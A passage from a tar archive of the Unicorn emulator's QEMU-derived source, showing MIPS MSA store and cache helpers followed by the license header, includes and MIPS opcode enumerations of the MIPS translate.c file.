MEMOP_IDX(DF_WORD) ensure_writable_pages(env, addr, mmu_idx, GETPC()); #if !defined(HOST_WORDS_BIGENDIAN) helper_ret_stl_mmu(env, addr + (0 << DF_WORD), pwd->w[0], oi, GETPC()); helper_ret_stl_mmu(env, addr + (1 << DF_WORD), pwd->w[1], oi, GETPC()); helper_ret_stl_mmu(env, addr + (2 << DF_WORD), pwd->w[2], oi, GETPC()); helper_ret_stl_mmu(env, addr + (3 << DF_WORD), pwd->w[3], oi, GETPC()); #else helper_ret_stl_mmu(env, addr + (1 << DF_WORD), pwd->w[0], oi, GETPC()); helper_ret_stl_mmu(env, addr + (0 << DF_WORD), pwd->w[1], oi, GETPC()); helper_ret_stl_mmu(env, addr + (3 << DF_WORD), pwd->w[2], oi, GETPC()); helper_ret_stl_mmu(env, addr + (2 << DF_WORD), pwd->w[3], oi, GETPC()); #endif } void helper_msa_st_d(CPUMIPSState *env, uint32_t wd, target_ulong addr) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); int mmu_idx = cpu_mmu_index(env, false); MEMOP_IDX(DF_DOUBLE) ensure_writable_pages(env, addr, mmu_idx, GETPC()); helper_ret_stq_mmu(env, addr + (0 << DF_DOUBLE), pwd->d[0], oi, GETPC()); helper_ret_stq_mmu(env, addr + (1 << DF_DOUBLE), pwd->d[1], oi, GETPC()); } void helper_cache(CPUMIPSState *env, target_ulong addr, uint32_t op) { target_ulong index = addr & 0x1fffffff; if (op == 9) { /* Index Store Tag */ memory_region_dispatch_write(env->uc, env->itc_tag, index, env->CP0_TagLo, MO_64, MEMTXATTRS_UNSPECIFIED); } else if (op == 5) { /* Index Load Tag */ memory_region_dispatch_read(env->uc, env->itc_tag, index, &env->CP0_TagLo, MO_64, MEMTXATTRS_UNSPECIFIED); } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/translate.c����������������������������������������������������������0000664�0000000�0000000�00004026523�14675241067�0020566�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS emulation for QEMU - main translation routines * * Copyright (c) 2004-2005 Jocelyn Mayer * Copyright (c) 2006 Marius Groeger (FPU operations) * Copyright (c) 2006 Thiemo Seufer (MIPS32R2 support) * Copyright (c) 2009 CodeSourcery (MIPS16 and microMIPS support) * Copyright (c) 2012 Jia Liu & Dongxue Zhang (MIPS ASE DSP support) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "hw/mips/cpudevs.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #include "exec/translator.h" #define MIPS_DEBUG_DISAS 0 /* MIPS major opcodes */ #define MASK_OP_MAJOR(op) (op & (0x3FUL << 26)) enum { /* indirect opcode tables */ OPC_SPECIAL = (0x00 << 26), OPC_REGIMM = (0x01 << 26), OPC_CP0 = (0x10 << 26), OPC_CP1 = (0x11 << 26), OPC_CP2 = (0x12 << 26), OPC_CP3 = (0x13 << 26), OPC_SPECIAL2 = (0x1C << 26), OPC_SPECIAL3 = (0x1F << 26), /* arithmetic with immediate */ OPC_ADDI = (0x08 << 26), OPC_ADDIU = (0x09 << 26), OPC_SLTI = (0x0A << 26), OPC_SLTIU = (0x0B << 26), /* logic with immediate */ OPC_ANDI = (0x0C << 26), OPC_ORI = (0x0D << 26), OPC_XORI = (0x0E << 26), OPC_LUI = (0x0F << 26), /* arithmetic with immediate */ OPC_DADDI = (0x18 << 26), OPC_DADDIU = (0x19 << 26), /* Jump and branches */ OPC_J = (0x02 << 26), OPC_JAL = (0x03 << 26), OPC_BEQ = (0x04 << 26), /* Unconditional if rs = rt = 0 (B) */ OPC_BEQL = (0x14 << 26), OPC_BNE = (0x05 << 26), OPC_BNEL = (0x15 << 26), OPC_BLEZ = (0x06 << 26), OPC_BLEZL = (0x16 << 26), OPC_BGTZ = (0x07 << 26), OPC_BGTZL = (0x17 << 26), OPC_JALX = (0x1D << 26), OPC_DAUI = (0x1D << 26), /* Load and stores */ OPC_LDL = (0x1A << 26), OPC_LDR = (0x1B << 26), OPC_LB = (0x20 << 26), OPC_LH = (0x21 << 26), OPC_LWL = (0x22 << 26), OPC_LW = (0x23 << 26), OPC_LWPC = OPC_LW | 0x5, OPC_LBU = (0x24 << 26), OPC_LHU = (0x25 << 26), OPC_LWR = (0x26 << 26), OPC_LWU = (0x27 << 26), OPC_SB = (0x28 << 26), OPC_SH = (0x29 << 26), OPC_SWL = (0x2A << 26), OPC_SW = (0x2B << 26), OPC_SDL = (0x2C << 26), OPC_SDR = (0x2D << 26), OPC_SWR = (0x2E << 26), OPC_LL = (0x30 << 26), OPC_LLD = (0x34 << 26), OPC_LD = (0x37 << 26), OPC_LDPC = OPC_LD | 0x5, OPC_SC = (0x38 << 26), OPC_SCD = (0x3C << 26), OPC_SD = (0x3F << 26), /* Floating point load/store */ OPC_LWC1 = (0x31 << 26), OPC_LWC2 = (0x32 << 26), OPC_LDC1 = (0x35 << 26), OPC_LDC2 = (0x36 << 26), OPC_SWC1 = (0x39 << 26), OPC_SWC2 = (0x3A << 26), OPC_SDC1 = (0x3D << 26), OPC_SDC2 = (0x3E << 26), /* Compact Branches */ OPC_BLEZALC = (0x06 << 26), OPC_BGEZALC = (0x06 << 26), OPC_BGEUC = (0x06 << 26), OPC_BGTZALC = (0x07 << 26), OPC_BLTZALC = (0x07 << 26), OPC_BLTUC = (0x07 << 26), OPC_BOVC = (0x08 << 26), OPC_BEQZALC = (0x08 << 26), OPC_BEQC = (0x08 << 26), OPC_BLEZC = (0x16 << 26), OPC_BGEZC = (0x16 << 26), OPC_BGEC = (0x16 << 26), OPC_BGTZC = (0x17 << 26), OPC_BLTZC = (0x17 << 26), OPC_BLTC = (0x17 << 26), OPC_BNVC = (0x18 << 26), OPC_BNEZALC = (0x18 << 26), OPC_BNEC = (0x18 << 26), OPC_BC = (0x32 << 26), OPC_BEQZC = (0x36 << 26), OPC_JIC = (0x36 << 26), OPC_BALC = (0x3A << 26), OPC_BNEZC = (0x3E << 26), OPC_JIALC = (0x3E << 26), /* MDMX ASE specific */ OPC_MDMX = (0x1E << 26), /* MSA ASE, same as MDMX */ OPC_MSA = OPC_MDMX, /* Cache and prefetch */ OPC_CACHE = (0x2F << 26), OPC_PREF = (0x33 << 26), /* PC-relative address computation / loads */ OPC_PCREL = (0x3B << 26), }; /* PC-relative address computation / loads */ #define MASK_OPC_PCREL_TOP2BITS(op) (MASK_OP_MAJOR(op) | (op & (3 << 19))) #define MASK_OPC_PCREL_TOP5BITS(op) (MASK_OP_MAJOR(op) | (op & (0x1f << 16))) enum { /* Instructions determined by bits 19 and 20 */ OPC_ADDIUPC = OPC_PCREL | (0 << 19), R6_OPC_LWPC = OPC_PCREL | (1 << 19), OPC_LWUPC = OPC_PCREL | (2 << 19), /* Instructions determined by bits 16 ... 20 */ OPC_AUIPC = OPC_PCREL | (0x1e << 16), OPC_ALUIPC = OPC_PCREL | (0x1f << 16), /* Other */ R6_OPC_LDPC = OPC_PCREL | (6 << 18), }; /* MIPS special opcodes */ #define MASK_SPECIAL(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { /* Shifts */ OPC_SLL = 0x00 | OPC_SPECIAL, /* NOP is SLL r0, r0, 0 */ /* SSNOP is SLL r0, r0, 1 */ /* EHB is SLL r0, r0, 3 */ OPC_SRL = 0x02 | OPC_SPECIAL, /* also ROTR */ OPC_ROTR = OPC_SRL | (1 << 21), OPC_SRA = 0x03 | OPC_SPECIAL, OPC_SLLV = 0x04 | OPC_SPECIAL, OPC_SRLV = 0x06 | OPC_SPECIAL, /* also ROTRV */ OPC_ROTRV = OPC_SRLV | (1 << 6), OPC_SRAV = 0x07 | OPC_SPECIAL, OPC_DSLLV = 0x14 | OPC_SPECIAL, OPC_DSRLV = 0x16 | OPC_SPECIAL, /* also DROTRV */ OPC_DROTRV = OPC_DSRLV | (1 << 6), OPC_DSRAV = 0x17 | OPC_SPECIAL, OPC_DSLL = 0x38 | OPC_SPECIAL, OPC_DSRL = 0x3A | OPC_SPECIAL, /* also DROTR */ OPC_DROTR = OPC_DSRL | (1 << 21), OPC_DSRA = 0x3B | OPC_SPECIAL, OPC_DSLL32 = 0x3C | OPC_SPECIAL, OPC_DSRL32 = 0x3E | OPC_SPECIAL, /* also DROTR32 */ OPC_DROTR32 = OPC_DSRL32 | (1 << 21), OPC_DSRA32 = 0x3F | OPC_SPECIAL, /* Multiplication / division */ OPC_MULT = 0x18 | OPC_SPECIAL, OPC_MULTU = 0x19 | OPC_SPECIAL, OPC_DIV = 0x1A | OPC_SPECIAL, OPC_DIVU = 0x1B | OPC_SPECIAL, OPC_DMULT = 0x1C | OPC_SPECIAL, OPC_DMULTU = 0x1D | OPC_SPECIAL, OPC_DDIV = 0x1E | OPC_SPECIAL, OPC_DDIVU = 0x1F | OPC_SPECIAL, /* 2 registers arithmetic / logic */ OPC_ADD = 0x20 | OPC_SPECIAL, OPC_ADDU = 0x21 | OPC_SPECIAL, OPC_SUB = 0x22 | OPC_SPECIAL, OPC_SUBU = 0x23 | OPC_SPECIAL, OPC_AND = 0x24 | OPC_SPECIAL, OPC_OR = 0x25 | OPC_SPECIAL, OPC_XOR = 0x26 | OPC_SPECIAL, OPC_NOR = 0x27 | OPC_SPECIAL, OPC_SLT = 0x2A | OPC_SPECIAL, OPC_SLTU = 0x2B | OPC_SPECIAL, OPC_DADD = 0x2C | OPC_SPECIAL, OPC_DADDU = 0x2D | OPC_SPECIAL, OPC_DSUB = 0x2E | OPC_SPECIAL, OPC_DSUBU = 0x2F | OPC_SPECIAL, /* Jumps */ OPC_JR = 0x08 | OPC_SPECIAL, /* Also JR.HB */ OPC_JALR = 0x09 | OPC_SPECIAL, /* Also JALR.HB */ /* Traps */ OPC_TGE = 0x30 | OPC_SPECIAL, OPC_TGEU = 0x31 | OPC_SPECIAL, OPC_TLT = 0x32 | OPC_SPECIAL, OPC_TLTU = 0x33 | OPC_SPECIAL, OPC_TEQ = 0x34 | OPC_SPECIAL, OPC_TNE = 0x36 | OPC_SPECIAL, /* HI / LO registers load & stores */ OPC_MFHI = 0x10 | OPC_SPECIAL, OPC_MTHI = 0x11 | OPC_SPECIAL, OPC_MFLO = 0x12 | OPC_SPECIAL, OPC_MTLO = 0x13 | OPC_SPECIAL, /* Conditional moves */ OPC_MOVZ = 0x0A | OPC_SPECIAL, OPC_MOVN = 0x0B | OPC_SPECIAL, OPC_SELEQZ = 0x35 | OPC_SPECIAL, OPC_SELNEZ = 0x37 | OPC_SPECIAL, OPC_MOVCI = 0x01 | OPC_SPECIAL, /* Special */ OPC_PMON = 0x05 | OPC_SPECIAL, /* unofficial */ OPC_SYSCALL = 0x0C | OPC_SPECIAL, OPC_BREAK = 0x0D | OPC_SPECIAL, OPC_SPIM = 0x0E | OPC_SPECIAL, /* unofficial */ OPC_SYNC = 0x0F | OPC_SPECIAL, OPC_SPECIAL28_RESERVED = 0x28 | OPC_SPECIAL, OPC_SPECIAL29_RESERVED = 0x29 | OPC_SPECIAL, OPC_SPECIAL39_RESERVED = 0x39 | OPC_SPECIAL, OPC_SPECIAL3D_RESERVED = 0x3D | OPC_SPECIAL, }; /* * R6 Multiply and Divide instructions have the same opcode * and function field as legacy OPC_MULT[U]/OPC_DIV[U] */ #define MASK_R6_MULDIV(op) (MASK_SPECIAL(op) | (op & (0x7ff))) enum { R6_OPC_MUL = OPC_MULT | (2 << 6), R6_OPC_MUH = OPC_MULT | (3 << 6), R6_OPC_MULU = OPC_MULTU | (2 << 6), R6_OPC_MUHU = OPC_MULTU | (3 << 6), R6_OPC_DIV = OPC_DIV | (2 << 6), R6_OPC_MOD = OPC_DIV | (3 << 6), R6_OPC_DIVU = OPC_DIVU | (2 << 6), R6_OPC_MODU = OPC_DIVU | (3 << 6), R6_OPC_DMUL = OPC_DMULT | (2 << 6), R6_OPC_DMUH = OPC_DMULT | (3 << 6), R6_OPC_DMULU = OPC_DMULTU | (2 << 6), R6_OPC_DMUHU = OPC_DMULTU | (3 << 6), R6_OPC_DDIV = OPC_DDIV | (2 << 6), R6_OPC_DMOD = OPC_DDIV | (3 << 6), R6_OPC_DDIVU = OPC_DDIVU | (2 << 6), R6_OPC_DMODU = OPC_DDIVU | (3 << 6), R6_OPC_CLZ = 0x10 | OPC_SPECIAL, R6_OPC_CLO = 0x11 | OPC_SPECIAL, R6_OPC_DCLZ = 0x12 | OPC_SPECIAL, R6_OPC_DCLO = 0x13 | OPC_SPECIAL, R6_OPC_SDBBP = 0x0e | OPC_SPECIAL, OPC_LSA = 0x05 | OPC_SPECIAL, OPC_DLSA = 0x15 | OPC_SPECIAL, }; /* Multiplication variants of the vr54xx. */ #define MASK_MUL_VR54XX(op) (MASK_SPECIAL(op) | (op & (0x1F << 6))) enum { OPC_VR54XX_MULS = (0x03 << 6) | OPC_MULT, OPC_VR54XX_MULSU = (0x03 << 6) | OPC_MULTU, OPC_VR54XX_MACC = (0x05 << 6) | OPC_MULT, OPC_VR54XX_MACCU = (0x05 << 6) | OPC_MULTU, OPC_VR54XX_MSAC = (0x07 << 6) | OPC_MULT, OPC_VR54XX_MSACU = (0x07 << 6) | OPC_MULTU, OPC_VR54XX_MULHI = (0x09 << 6) | OPC_MULT, OPC_VR54XX_MULHIU = (0x09 << 6) | OPC_MULTU, OPC_VR54XX_MULSHI = (0x0B << 6) | OPC_MULT, OPC_VR54XX_MULSHIU = (0x0B << 6) | OPC_MULTU, OPC_VR54XX_MACCHI = (0x0D << 6) | OPC_MULT, OPC_VR54XX_MACCHIU = (0x0D << 6) | OPC_MULTU, OPC_VR54XX_MSACHI = (0x0F << 6) | OPC_MULT, OPC_VR54XX_MSACHIU = (0x0F << 6) | OPC_MULTU, }; /* REGIMM (rt field) opcodes */ #define MASK_REGIMM(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 16))) enum { OPC_BLTZ = (0x00 << 16) | OPC_REGIMM, OPC_BLTZL = (0x02 << 16) | OPC_REGIMM, OPC_BGEZ = (0x01 << 16) | OPC_REGIMM, OPC_BGEZL = (0x03 << 16) | OPC_REGIMM, OPC_BLTZAL = (0x10 << 16) | OPC_REGIMM, OPC_BLTZALL = (0x12 << 16) | OPC_REGIMM, OPC_BGEZAL = (0x11 << 16) | OPC_REGIMM, OPC_BGEZALL = (0x13 << 16) | OPC_REGIMM, OPC_TGEI = (0x08 << 16) | OPC_REGIMM, OPC_TGEIU = (0x09 << 16) | OPC_REGIMM, OPC_TLTI = (0x0A << 16) | OPC_REGIMM, OPC_TLTIU = (0x0B << 16) | OPC_REGIMM, OPC_TEQI = (0x0C << 16) | OPC_REGIMM, OPC_TNEI = (0x0E << 16) | OPC_REGIMM, OPC_SIGRIE = (0x17 << 16) | OPC_REGIMM, OPC_SYNCI = (0x1F << 16) | OPC_REGIMM, OPC_DAHI = (0x06 << 16) | OPC_REGIMM, OPC_DATI = (0x1e << 16) | OPC_REGIMM, }; /* Special2 opcodes */ #define MASK_SPECIAL2(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { /* Multiply & xxx operations */ OPC_MADD = 0x00 | OPC_SPECIAL2, OPC_MADDU = 0x01 | OPC_SPECIAL2, OPC_MUL = 0x02 | OPC_SPECIAL2, OPC_MSUB = 0x04 | OPC_SPECIAL2, OPC_MSUBU = 0x05 | OPC_SPECIAL2, /* Loongson 2F */ OPC_MULT_G_2F = 0x10 | OPC_SPECIAL2, OPC_DMULT_G_2F = 0x11 | OPC_SPECIAL2, OPC_MULTU_G_2F = 0x12 | OPC_SPECIAL2, OPC_DMULTU_G_2F = 0x13 | OPC_SPECIAL2, OPC_DIV_G_2F = 0x14 | OPC_SPECIAL2, OPC_DDIV_G_2F = 0x15 | OPC_SPECIAL2, OPC_DIVU_G_2F = 0x16 | OPC_SPECIAL2, OPC_DDIVU_G_2F = 0x17 | OPC_SPECIAL2, OPC_MOD_G_2F = 0x1c | OPC_SPECIAL2, OPC_DMOD_G_2F = 0x1d | OPC_SPECIAL2, OPC_MODU_G_2F = 0x1e | OPC_SPECIAL2, OPC_DMODU_G_2F = 0x1f | OPC_SPECIAL2, /* Misc */ OPC_CLZ = 0x20 | OPC_SPECIAL2, OPC_CLO = 0x21 | OPC_SPECIAL2, OPC_DCLZ = 0x24 | OPC_SPECIAL2, OPC_DCLO = 0x25 | OPC_SPECIAL2, /* Special */ OPC_SDBBP = 0x3F | OPC_SPECIAL2, }; /* Special3 opcodes */ #define MASK_SPECIAL3(op) (MASK_OP_MAJOR(op) | (op & 0x3F)) enum { OPC_EXT = 0x00 | OPC_SPECIAL3, OPC_DEXTM = 0x01 | OPC_SPECIAL3, OPC_DEXTU = 0x02 | OPC_SPECIAL3, OPC_DEXT = 0x03 | OPC_SPECIAL3, OPC_INS = 0x04 | OPC_SPECIAL3, OPC_DINSM = 0x05 | OPC_SPECIAL3, OPC_DINSU = 0x06 | OPC_SPECIAL3, OPC_DINS = 0x07 | OPC_SPECIAL3, OPC_FORK = 0x08 | OPC_SPECIAL3, OPC_YIELD = 0x09 | OPC_SPECIAL3, OPC_BSHFL = 0x20 | OPC_SPECIAL3, OPC_DBSHFL = 0x24 | OPC_SPECIAL3, OPC_RDHWR = 0x3B | OPC_SPECIAL3, OPC_GINV = 0x3D | OPC_SPECIAL3, /* Loongson 2E */ OPC_MULT_G_2E = 0x18 | OPC_SPECIAL3, OPC_MULTU_G_2E = 0x19 | OPC_SPECIAL3, OPC_DIV_G_2E = 0x1A | OPC_SPECIAL3, OPC_DIVU_G_2E = 0x1B | OPC_SPECIAL3, OPC_DMULT_G_2E = 0x1C | OPC_SPECIAL3, OPC_DMULTU_G_2E = 0x1D | OPC_SPECIAL3, OPC_DDIV_G_2E = 0x1E | OPC_SPECIAL3, OPC_DDIVU_G_2E = 0x1F | OPC_SPECIAL3, OPC_MOD_G_2E = 0x22 | OPC_SPECIAL3, OPC_MODU_G_2E = 0x23 | OPC_SPECIAL3, OPC_DMOD_G_2E = 0x26 | OPC_SPECIAL3, OPC_DMODU_G_2E = 0x27 | OPC_SPECIAL3, /* MIPS DSP Load */ OPC_LX_DSP = 0x0A | OPC_SPECIAL3, /* MIPS DSP Arithmetic */ OPC_ADDU_QB_DSP = 0x10 | OPC_SPECIAL3, OPC_ADDU_OB_DSP = 0x14 | OPC_SPECIAL3, OPC_ABSQ_S_PH_DSP = 0x12 | OPC_SPECIAL3, OPC_ABSQ_S_QH_DSP = 0x16 | OPC_SPECIAL3, /* OPC_ADDUH_QB_DSP is same as OPC_MULT_G_2E. */ /* OPC_ADDUH_QB_DSP = 0x18 | OPC_SPECIAL3, */ OPC_CMPU_EQ_QB_DSP = 0x11 | OPC_SPECIAL3, OPC_CMPU_EQ_OB_DSP = 0x15 | OPC_SPECIAL3, /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_QB_DSP = 0x13 | OPC_SPECIAL3, OPC_SHLL_OB_DSP = 0x17 | OPC_SPECIAL3, /* MIPS DSP Multiply Sub-class insns */ /* OPC_MUL_PH_DSP is same as OPC_ADDUH_QB_DSP. */ /* OPC_MUL_PH_DSP = 0x18 | OPC_SPECIAL3, */ OPC_DPA_W_PH_DSP = 0x30 | OPC_SPECIAL3, OPC_DPAQ_W_QH_DSP = 0x34 | OPC_SPECIAL3, /* DSP Bit/Manipulation Sub-class */ OPC_INSV_DSP = 0x0C | OPC_SPECIAL3, OPC_DINSV_DSP = 0x0D | OPC_SPECIAL3, /* MIPS DSP Append Sub-class */ OPC_APPEND_DSP = 0x31 | OPC_SPECIAL3, OPC_DAPPEND_DSP = 0x35 | OPC_SPECIAL3, /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_EXTR_W_DSP = 0x38 | OPC_SPECIAL3, OPC_DEXTR_W_DSP = 0x3C | OPC_SPECIAL3, /* EVA */ OPC_LWLE = 0x19 | OPC_SPECIAL3, OPC_LWRE = 0x1A | OPC_SPECIAL3, OPC_CACHEE = 0x1B | OPC_SPECIAL3, OPC_SBE = 0x1C | OPC_SPECIAL3, OPC_SHE = 0x1D | OPC_SPECIAL3, OPC_SCE = 0x1E | OPC_SPECIAL3, OPC_SWE = 0x1F | OPC_SPECIAL3, OPC_SWLE = 0x21 | OPC_SPECIAL3, OPC_SWRE = 0x22 | OPC_SPECIAL3, OPC_PREFE = 0x23 | OPC_SPECIAL3, OPC_LBUE = 0x28 | OPC_SPECIAL3, OPC_LHUE = 0x29 | OPC_SPECIAL3, OPC_LBE = 0x2C | OPC_SPECIAL3, OPC_LHE = 0x2D | OPC_SPECIAL3, OPC_LLE = 0x2E | OPC_SPECIAL3, OPC_LWE = 0x2F | OPC_SPECIAL3, /* R6 */ R6_OPC_PREF = 0x35 | OPC_SPECIAL3, R6_OPC_CACHE = 0x25 | OPC_SPECIAL3, R6_OPC_LL = 0x36 | OPC_SPECIAL3, R6_OPC_SC = 0x26 | OPC_SPECIAL3, R6_OPC_LLD = 0x37 | OPC_SPECIAL3, R6_OPC_SCD = 0x27 | OPC_SPECIAL3, }; /* BSHFL opcodes */ #define MASK_BSHFL(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { OPC_WSBH = (0x02 << 6) | OPC_BSHFL, OPC_SEB = (0x10 << 6) | OPC_BSHFL, OPC_SEH = (0x18 << 6) | OPC_BSHFL, OPC_ALIGN = (0x08 << 6) | OPC_BSHFL, /* 010.bp (010.00 to 010.11) */ OPC_ALIGN_1 = (0x09 << 6) | OPC_BSHFL, OPC_ALIGN_2 = (0x0A << 6) | OPC_BSHFL, OPC_ALIGN_3 = (0x0B << 6) | OPC_BSHFL, OPC_BITSWAP = (0x00 << 6) | OPC_BSHFL /* 00000 */ }; /* DBSHFL opcodes */ #define MASK_DBSHFL(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { OPC_DSBH = (0x02 << 6) | OPC_DBSHFL, OPC_DSHD = (0x05 << 6) | OPC_DBSHFL, OPC_DALIGN = (0x08 << 6) | OPC_DBSHFL, /* 01.bp (01.000 to 01.111) */ OPC_DALIGN_1 = (0x09 << 6) | OPC_DBSHFL, OPC_DALIGN_2 = (0x0A << 6) | OPC_DBSHFL, OPC_DALIGN_3 = (0x0B << 6) | OPC_DBSHFL, OPC_DALIGN_4 = (0x0C << 6) | OPC_DBSHFL, OPC_DALIGN_5 = (0x0D << 6) | OPC_DBSHFL, OPC_DALIGN_6 = (0x0E << 6) | OPC_DBSHFL, OPC_DALIGN_7 = (0x0F << 6) | OPC_DBSHFL, OPC_DBITSWAP = (0x00 << 6) | OPC_DBSHFL, /* 00000 */ }; /* MIPS DSP REGIMM opcodes */ enum { OPC_BPOSGE32 = (0x1C << 16) | OPC_REGIMM, OPC_BPOSGE64 = (0x1D << 16) | OPC_REGIMM, }; #define MASK_LX(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) /* MIPS DSP Load */ enum { OPC_LBUX = (0x06 << 6) | OPC_LX_DSP, OPC_LHX = (0x04 << 6) | OPC_LX_DSP, OPC_LWX = (0x00 << 6) | OPC_LX_DSP, OPC_LDX = (0x08 << 6) | OPC_LX_DSP, }; #define MASK_ADDU_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ADDQ_PH = (0x0A << 6) | OPC_ADDU_QB_DSP, OPC_ADDQ_S_PH = (0x0E << 6) | OPC_ADDU_QB_DSP, OPC_ADDQ_S_W = (0x16 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_QB = (0x00 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_S_QB = (0x04 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_PH = (0x08 << 6) | OPC_ADDU_QB_DSP, OPC_ADDU_S_PH = (0x0C << 6) | OPC_ADDU_QB_DSP, OPC_SUBQ_PH = (0x0B << 6) | OPC_ADDU_QB_DSP, OPC_SUBQ_S_PH = (0x0F << 6) | OPC_ADDU_QB_DSP, OPC_SUBQ_S_W = (0x17 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_QB = (0x01 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_S_QB = (0x05 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_PH = (0x09 << 6) | OPC_ADDU_QB_DSP, OPC_SUBU_S_PH = (0x0D << 6) | OPC_ADDU_QB_DSP, OPC_ADDSC = (0x10 << 6) | OPC_ADDU_QB_DSP, OPC_ADDWC = (0x11 << 6) | OPC_ADDU_QB_DSP, OPC_MODSUB = (0x12 << 6) | OPC_ADDU_QB_DSP, OPC_RADDU_W_QB = (0x14 << 6) | OPC_ADDU_QB_DSP, /* MIPS DSP Multiply Sub-class insns */ OPC_MULEU_S_PH_QBL = (0x06 << 6) | OPC_ADDU_QB_DSP, OPC_MULEU_S_PH_QBR = (0x07 << 6) | OPC_ADDU_QB_DSP, OPC_MULQ_RS_PH = (0x1F << 6) | OPC_ADDU_QB_DSP, OPC_MULEQ_S_W_PHL = (0x1C << 6) | OPC_ADDU_QB_DSP, OPC_MULEQ_S_W_PHR = (0x1D << 6) | OPC_ADDU_QB_DSP, OPC_MULQ_S_PH = (0x1E << 6) | OPC_ADDU_QB_DSP, }; #define OPC_ADDUH_QB_DSP OPC_MULT_G_2E #define MASK_ADDUH_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ADDUH_QB = (0x00 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDUH_R_QB = (0x02 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_PH = (0x08 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_R_PH = (0x0A << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_W = (0x10 << 6) | OPC_ADDUH_QB_DSP, OPC_ADDQH_R_W = (0x12 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBUH_QB = (0x01 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBUH_R_QB = (0x03 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_PH = (0x09 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_R_PH = (0x0B << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_W = (0x11 << 6) | OPC_ADDUH_QB_DSP, OPC_SUBQH_R_W = (0x13 << 6) | OPC_ADDUH_QB_DSP, /* MIPS DSP Multiply Sub-class insns */ OPC_MUL_PH = (0x0C << 6) | OPC_ADDUH_QB_DSP, OPC_MUL_S_PH = (0x0E << 6) | OPC_ADDUH_QB_DSP, OPC_MULQ_S_W = (0x16 << 6) | OPC_ADDUH_QB_DSP, OPC_MULQ_RS_W = (0x17 << 6) | OPC_ADDUH_QB_DSP, }; #define MASK_ABSQ_S_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_ABSQ_S_QB = (0x01 << 6) | OPC_ABSQ_S_PH_DSP, OPC_ABSQ_S_PH = (0x09 << 6) | OPC_ABSQ_S_PH_DSP, OPC_ABSQ_S_W = (0x11 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQ_W_PHL = (0x0C << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQ_W_PHR = (0x0D << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBL = (0x04 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBR = (0x05 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBLA = (0x06 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEQU_PH_QBRA = (0x07 << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBL = (0x1C << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBR = (0x1D << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBLA = (0x1E << 6) | OPC_ABSQ_S_PH_DSP, OPC_PRECEU_PH_QBRA = (0x1F << 6) | OPC_ABSQ_S_PH_DSP, /* DSP Bit/Manipulation Sub-class */ OPC_BITREV = (0x1B << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPL_QB = (0x02 << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPLV_QB = (0x03 << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPL_PH = (0x0A << 6) | OPC_ABSQ_S_PH_DSP, OPC_REPLV_PH = (0x0B << 6) | OPC_ABSQ_S_PH_DSP, }; #define MASK_CMPU_EQ_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_PRECR_QB_PH = (0x0D << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQ_QB_PH = (0x0C << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECR_SRA_PH_W = (0x1E << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECR_SRA_R_PH_W = (0x1F << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQ_PH_W = (0x14 << 6) | OPC_CMPU_EQ_QB_DSP, 